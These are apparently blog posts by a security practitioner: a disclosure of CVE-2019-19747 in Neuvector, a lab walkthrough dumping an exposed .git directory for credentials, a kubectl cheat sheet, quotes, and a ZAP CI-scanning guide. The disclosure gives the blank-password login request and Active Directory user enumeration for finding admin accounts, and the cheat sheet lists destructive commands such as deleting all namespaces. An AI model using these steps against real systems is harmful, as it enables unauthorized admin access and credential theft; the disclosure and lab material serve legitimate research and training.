CVE-2019-19747

Summary

On 11 December 2019 I discovered that it was possible in Neuvector 3.1 and below to authenticate as a valid AD LDAP user, using a blank password (there is client-side browser validation so send to the endpoint directly or disable the JS validation functions). Additionally, the user role is also returned in the response body from Neuvector making it possible to search for a user who has an “admin” role and thus have admin access to the Neuvector console.

Background

The Lightweight Directory Access Protocol (LDAP) allows for quick data lookups from an LDAP backend server. In order to retrieve information from the LDAP backend server, an LDAP client needs to establish a session with the server. There are different types of sessions, but they are all formed through a bind request to the server.

I’m not an expert on LDAP but it appears there are three general types of sessions supported.

  • An anonymous session – established through an anonymous bind where BOTH the password and the username MUST be blank.
  • An authenticated session – using a simple bind where BOTH the password and the username fields must NOT be blank.

And finally, the one where things get more interesting:

  • An unauthenticated simple bind session where one needs to only pass a valid username WITHOUT a password.

The Vulnerability

In section 5.1.2 of the LDAP RFC (rfc4513) we see the following and it provides insight into the vulnerability with Neuvector:

What the above means for security is that some LDAP clients may misinterpret the LDAP server response. For example, if a user performs a successful unauthenticated simple bind, because a session has been created, the LDAP client assumes the user is an authenticated user and NOT an anonymous user. This means anyone with a valid LDAP username can authenticate and gain access to the application without that user’s password 🤦‍♂️. The RFC explains this below:Furthermore, for companies using MS Active Directory prior to Server 2019 (likely the majority) it is not possible to prevent the vulnerability server side, as one cannot alter this config on the domain controllers (the option does not exist!). This means for most windows environments, it’s up to the LDAP client to enforce validation of the user input (disallowing empty passwords).

CVE-2019-19747

Neuvector allows for authentication through OpenLDAP or Microsoft Active Directory. When using MS AD (I only tested MS AD) Neuvector fails to disallow an empty password string and is thus vulnerable to what we discussed above. The following request provides the user with a valid token:

POST /auth HTTP/1.1
Host: neuvector.some.domain
Connection: close
Content-Length: 35
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Content-Type: application/json;charset=UTF-8
{"username":"bobalice","password":""}

Exploitation

Get a list of all active directory usernames:

Get-ADUser -Filter  {(Enabled -eq "true")} | Select-Object SamAccountName

Using the list of usernames Bruteforce for valid status codes to discover valid users:

Use your favourite string manipulation tool or the Length field to look for the admin role in the response body.

{"token":{"server":"abc123","email":"","role":"admin","username":"bobalice","default_password":false,"locale":"en","fullname":"abc123:bobalice","token":"abc"

Because Neuvector provides insight into the vulnerabilities in your container estate – this is gold for attackers wanting to pivot or maintain access as it basically paints a roadmap of which areas are the go to areas for compromise.

Neuvector have released a patch 3.1.1 that fixes the vulnerability. https://docs.neuvector.com:8334/releasenotes/3x

Comments

Neuvector are a security solution, a good one in my opinion so this is obviously not ideal, but before we crucify them, they are made up of humans and succumb to mistakes like the rest of us – let this be a good reminder that these mistakes are more common than we think, none of us are immune and we should not become complacent.

I commend Neuvector for their quick turnaround time in fixing the vulnerability and I am still a big fan of their solution for kubernetes. With that being said – I do have one criticism.

They did seem to downplay the vulnerability slightly and to my knowledge have not sent out an advisory to their clients to upgrade (I am a client and did not receive notice – this makes me sad as i would like to know as soon as possible if a severe vulnerability is discovered in a security product i use). I also got the impression that they thought it had more to do with an AD/server-side misconfiguration and I repeatedly explained that before windows server 2019, it was not possible to make the change server side.

As it stands there are probably Microsoft clients using Neuvector who cannot make the change server side and will remain vulnerable until they upgrade to 3.1.1+. Overall I am still a fan of Neuvector and will continue using them and I hope in future they will develop a security advisory section along with a method of rewarding security researchers for vulnerabilities.

Activity History

Vulnerability discovered and disclosed to the vendor Neuvector on the 11th of December 2019

Neuvector issued a patch with the fix on the 17th of December 2019

Publicly disclosed 20th December 2019

Updates

Neuvector ended up sending out comms to clients on  the 26th of December. In the comms they once again blamed server side “This release fixes a potentially critical vulnerability that arises if an LDAP/AD server is misconfigured to allow unauthenticated (blank password) logins.”

Attack Defense – DevSecOps

Continuing with the DevOps theme. Today I will be trying out some of the DevSecOps labs that are offered by https://www.attackdefense.com. Follow the blue dots.

Target Discovery

Basic nmap 192.xxx.xxx.2-10 ping scan to identify our target

nmap 192.xxx.xxx.2-10

Target IP:192.xxx.xxx.3

.GIT

Now that we know our target IP. Lets look at the lab objectives:

As the port scan shows us – port 80 is open on our target. So lets focus there. As usual, first step is to look for discovereable content. Lets use DIRB and see if there is any low hanging fruit that could contain a password.

dirb http://192.xxx.xxx.3

Bingo! “.Git” that’s our focus.

Head over to https://github.com/internetwache/GitTools and clone it locally. This is the toolkit we are going to use to complete to rest of the lab. The idea here is to first dump git to our local machine, extract it and look for a password (hopefully left in the repo)

Dumping

./gitdumper.sh 192.125.70.3/.git/ dump

Extracting

./extractor.sh /root/tools/GitTools/Dumper/dump/ extract

Config.php

We have extracted our dump taken from the web server at port 80. Its time to look for potentially sensitive files.

Config.php – Bingo!

Done

One Liners and Quotes I love

From time to time I’ll stumble upon a sequence of words that resonate with me, this is a list of some of them…

True honesty is only possible when it is unconditional. The truth is only the truth when it is given as a gift. Speak the truth not based on the outcome. What’s important is you expressing the truth, not the result.

Know what you want, so you can recognise it when it’s in front of you.

The virtuous worry about their integrity, lesser humans about their reputation.

Remembering you are going to die is the best way I know to avoid the trap of thinking you have something to lose. There’s no reason not to follow your heart.

Everyone wants the truth but there are very few who are willing to give it.

The world is full of lonely people waiting for other people to make the first move.

At the touch of love everyone becomes a poet. – Plato

It takes a long time to grow an old friend

It is the mark of an educated mind to be able to entertain a thought without accepting it.
– Aristotle

Kubernetes – List of Frequently Used Commands

— This is a living post — New commands will be added as I discover any of use —

Basics

#get information about namespace
kubectl describe namespaces <namespace>
#get information about a pod
kubectl describe pods <podname> -n <namespace>
#delete pod in specific namespace
kubectl delete pods -n <namespace> <pod_name>
#logs for specific pod
kubectl logs <podname>
#cordon off node
kubectl cordon <nodename>
#list Services
kubectl get services
#delete all namespaces
kubectl delete --all namespaces

Useful

#count number of returned pods
kubectl get pods -n <namespace> | wc -l
#change lifetime of namespace
kubectl annotate namespaces <namespace>/lifetime-minutes=400 --overwrite
#find pods running on same node and output in wide format
kubectl get pods --all-namespaces --field-selector spec.nodeName=<nodename> -o wide
#logs for specific container on pod
kubectl logs <podname> -c <containername>
#watch nodes 
kubectl get nodes -w
#execute shell in container on pod
kubectl exec -it <podname> -- bash
#List nodes with their labels
kubectl get nodes --show-labels
#FORCE delete when pods are stuck in TERMINATING
kubectl delete pods --grace-period=0 --force --all --namespace <namespace>
#Get all pods in all namespaces
kubectl get pods --all-namespaces --output=wide

Utility

#scale all deployments
kubectl scale --replicas=0 deployment $'kubectl get deployments -n <namespace> |awk -F' ' '{ print $1 }'' -n <namespace>
#drain node
kubectl drain <nodename> --force --ignore-daemonsets --delete-local-data
#show usage for node
kubectl top node <nodename>  
#Show usage for pod
kubectl top <podname>
#follow logs
kubectl get logs <pod-name> -n <namespace> -f
#View running container environment variables
kubectl exec -it -n <ci-namespace> >runner-pod> env | grep <CI_BUILD>

Perspective, Change and Awareness

Perspective, Change and Awareness

Take a second and think of a time where your worldview differed to your current worldview. Now think about 5 years before then, and for the older folk, even 5 years before then.

Notice something? It’s a cycle of changing perspective, mostly due to fluctuating levels of awareness. If you’re like me you’ll notice something else – your old worldview seems outdated now and you may even find it laughable at how little awareness you had back then. Perhaps one day I’ll approach this very post with the same mind-set, repeating the exact process I have just described above and i’ll laugh at how little I knew and how naive my perspective was.

It seems as though this pattern repeats itself over and over again. You gain more awareness, modifying your perspective, leading one to assume their old worldview/perspective was wrong and how their new one is correct. The caveat here is that although ones worldview may be somewhat broader than before – it’s still limited. Not to mention the obvious bias you’ll have towards your current perspective.

Change in perspective is normal and gaining greater awareness is admirable but I can assure you that a revelation/new found awareness is not the ultimate wisdom in the universe. The key take away here is to always be aware of the limitations a perspective has – all of them.

 

DevSecOps – Integrating Vulnerability Scanning Within the CI/CD Pipeline Part 1

Recently I made a slight career change, a shift into DevSecOps as opposed to pure sec – i’m excited and loving it so far. My first task – integrate security scanning within the pipeline. Disclaimer: This article is very beginner friendly.

Our tech stack that supports our CI/CD consists of Kubernetes, docker and Gitlab. I didn’t find much on getting automated security scanning going using Gitlab so I basically started from scratch.

Picking a tool

Coming off a pentesting background i’m comfortable with OWASP ZAP as well as Burp Suite. Burp Suite has recently released an enterprise edition that touts CI integration but my gut was telling me that it would be easier with ZAP, as there may be more support online if (turned into when) I run into difficulties. The first thing to do now was find a Docker container that had ZAP installed. This did the trick.

Getting Started

I found a container online but I had no idea how Gitlab worked. I knew Gitlab was what we used for our entire SDLC lifecycle but I was not sure exactly how the CI/CD integration worked. Turns out the way it works is as follows:

Once you have commited your code, the code is compiled and a build is created. That build is run by Gitlab and Gitlab carries out a specific set of jobs that one can define using a YAML file. A YAML file is basically a configuration file that tells the Gitlab runners (carrying out the jobs) what to do. In our case it will need to tell the runners to kick off an automated scan. Remember, the idea here is to get a scan going every-time a developer commits a piece of code. If the scan picks up any HIGH sev vulnerabilities, the build should fail.

Configuring ZAP

ZAP needs to be able to kick off a scan automatically and fail the build if a High or Critical vuln is discovered. The following does the job:

 

!/bin/bash
 zap-cli --verbose quick-scan -sc --start-options '-config api.disablekey=true' \
 https://xxxx.xxxx.xxx.xxx \
 -l Informational | tee scan_result.txt; alerts=cat scan_result.txt | grep 'High|Critical' | (wc -l); echo $alerts
 Get Results
 if [ $alerts -gt 0 ]; then
   echo "$alerts findings. Build failing"
   exit 1
 else
   exit 0
   echo "success - no findings identified"
 fi

Save this as shellscript in your repo. In my case I am using Gitlab – So the next step is to tell the Gitlab runner what to do by creating a Gitlab CI yaml file. The below does the trick.

image: docker-registry.public-xxxxx.xxxxx.xxxxx/owasp/zap2docker-weekly

stages:
  - zap
 
Scan:
 stage: zap
 tags: [ kubernetes-deploy ]
 script:
   - ./quick-scan-zap.sh<br /><br /><br />
Boom!